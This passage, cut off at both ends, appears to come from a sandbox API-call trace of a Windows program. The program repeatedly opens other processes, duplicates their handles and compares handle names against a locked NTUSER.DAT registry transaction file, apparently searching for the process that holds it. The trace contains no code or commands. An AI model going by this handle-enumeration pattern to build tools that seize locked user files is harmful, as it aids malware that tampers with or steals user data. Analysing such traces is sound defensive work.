dwProcessId=0x178) returned 0x62c [0154.375] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.375] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.376] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.377] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.377] CloseHandle (hObject=0x670) returned 1 [0154.377] CloseHandle (hObject=0x680) returned 1 [0154.377] CloseHandle (hObject=0x62c) returned 1 [0154.377] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0154.377] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.377] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.378] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.378] CloseHandle (hObject=0x670) returned 1 [0154.378] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.378] CloseHandle (hObject=0x680) returned 1 [0154.378] CloseHandle (hObject=0x62c) returned 1 [0154.378] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0154.378] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.379] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.380] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.380] CloseHandle (hObject=0x670) returned 1 [0154.380] CloseHandle (hObject=0x680) returned 1 [0154.380] CloseHandle (hObject=0x62c) returned 1 [0154.380] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0154.380] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.380] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.381] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.381] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.381] CloseHandle (hObject=0x670) returned 1 [0154.381] CloseHandle (hObject=0x680) returned 1 [0154.381] CloseHandle (hObject=0x62c) returned 1 [0154.381] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0154.381] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.381] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.382] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.382] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.383] CloseHandle (hObject=0x670) returned 1 [0154.383] CloseHandle (hObject=0x680) returned 1 [0154.383] CloseHandle (hObject=0x62c) returned 1 [0154.383] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0154.383] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.383] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.385] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.385] CloseHandle (hObject=0x670) returned 1 [0154.385] CloseHandle (hObject=0x680) returned 1 [0154.385] CloseHandle (hObject=0x62c) returned 1 [0154.385] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0154.385] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.385] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.386] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.387] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.387] CloseHandle (hObject=0x670) returned 1 [0154.387] CloseHandle (hObject=0x680) returned 1 [0154.387] CloseHandle (hObject=0x62c) returned 1 [0154.387] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x62c [0154.387] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.388] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.388] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.388] CloseHandle (hObject=0x670) returned 1 [0154.388] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.388] CloseHandle (hObject=0x680) returned 1 [0154.389] CloseHandle (hObject=0x62c) returned 1 [0154.389] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x62c [0154.389] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.389] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.389] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.390] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.390] CloseHandle (hObject=0x670) returned 1 [0154.390] CloseHandle (hObject=0x680) returned 1 [0154.390] CloseHandle (hObject=0x62c) returned 1 [0154.390] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.390] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.390] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.391] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.392] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.392] CloseHandle (hObject=0x670) returned 1 [0154.392] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.392] CloseHandle (hObject=0x680) returned 1 [0154.392] CloseHandle (hObject=0x62c) returned 1 [0154.392] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.392] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.393] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.395] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.395] CloseHandle (hObject=0x670) returned 1 [0154.396] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.396] CloseHandle (hObject=0x680) returned 1 [0154.396] CloseHandle (hObject=0x62c) returned 1 [0154.396] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.396] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.396] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.397] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.397] CloseHandle (hObject=0x670) returned 1 [0154.397] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.397] CloseHandle (hObject=0x680) returned 1 [0154.397] CloseHandle (hObject=0x62c) returned 1 [0154.397] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.397] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.397] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.398] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.399] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.399] CloseHandle (hObject=0x670) returned 1 [0154.399] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.399] CloseHandle (hObject=0x680) returned 1 [0154.399] CloseHandle (hObject=0x62c) returned 1 [0154.399] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.399] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.400] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.401] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.401] CloseHandle (hObject=0x670) returned 1 [0154.401] CloseHandle (hObject=0x680) returned 1 [0154.401] CloseHandle (hObject=0x62c) returned 1 [0154.401] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.401] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.401] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.402] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.402] CloseHandle (hObject=0x670) returned 1 [0154.402] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.402] CloseHandle (hObject=0x680) returned 1 [0154.402] CloseHandle (hObject=0x62c) returned 1 [0154.402] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.403] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.403] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.403] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.405] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.405] CloseHandle (hObject=0x670) returned 1 [0154.405] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.405] CloseHandle (hObject=0x680) returned 1 [0154.405] CloseHandle (hObject=0x62c) returned 1 [0154.406] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.406] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.406] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.407] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.407] CloseHandle (hObject=0x670) returned 1 [0154.407] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.407] CloseHandle (hObject=0x680) returned 1 [0154.407] CloseHandle (hObject=0x62c) returned 1 [0154.407] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.407] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.407] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.408] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.408] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.408] CloseHandle (hObject=0x670) returned 1 [0154.409] CloseHandle (hObject=0x680) returned 1 [0154.409] CloseHandle (hObject=0x62c) returned 1 [0154.409] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.409] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.409] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.410] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.410] CloseHandle (hObject=0x670) returned 1 [0154.410] CloseHandle (hObject=0x680) returned 1 [0154.410] CloseHandle (hObject=0x62c) returned 1 [0154.410] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.410] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.411] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.413] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.413] CloseHandle (hObject=0x670) returned 1 [0154.413] _wcsicmp (_Str1="\\CatalogChangeListener-1d8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.413] CloseHandle (hObject=0x680) returned 1 [0154.413] CloseHandle (hObject=0x62c) returned 1 [0154.413] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.413] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.414] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.414] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.414] CloseHandle (hObject=0x670) returned 1 [0154.414] CloseHandle (hObject=0x680) returned 1 [0154.414] CloseHandle (hObject=0x62c) returned 1 [0154.414] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.415] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.418] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.420] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.420] CloseHandle (hObject=0x670) returned 1 [0154.420] CloseHandle (hObject=0x680) returned 1 [0154.420] CloseHandle (hObject=0x62c) returned 1 [0154.420] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0154.420] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x33c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.420] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.421] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.421] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.422] CloseHandle (hObject=0x670) returned 1 [0154.422] _wcsicmp (_Str1="\\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -62 [0154.422] CloseHandle (hObject=0x680) returned 1 [0154.422] CloseHandle (hObject=0x62c) returned 1 [0154.422] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.422] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.422] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.423] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.425] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.425] CloseHandle (hObject=0x670) returned 1 [0154.425] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.425] CloseHandle (hObject=0x680) returned 1 [0154.425] CloseHandle (hObject=0x62c) returned 1 [0154.425] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.425] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.425] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.426] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.426] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.427] CloseHandle (hObject=0x670) returned 1 [0154.427] CloseHandle (hObject=0x680) returned 1 [0154.427] CloseHandle (hObject=0x62c) returned 1 [0154.427] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.427] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.427] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.428] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.428] CloseHandle (hObject=0x670) returned 1 [0154.428] CloseHandle (hObject=0x680) returned 1 [0154.428] CloseHandle (hObject=0x62c) returned 1 [0154.428] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.428] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.428] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.429] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.429] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.429] CloseHandle (hObject=0x670) returned 1 [0154.429] _wcsicmp (_Str1="\\PASSWD.LOG", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0154.429] CloseHandle (hObject=0x680) returned 1 [0154.429] CloseHandle (hObject=0x62c) returned 1 [0154.429] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0154.429] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x354, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.429] CreateThread 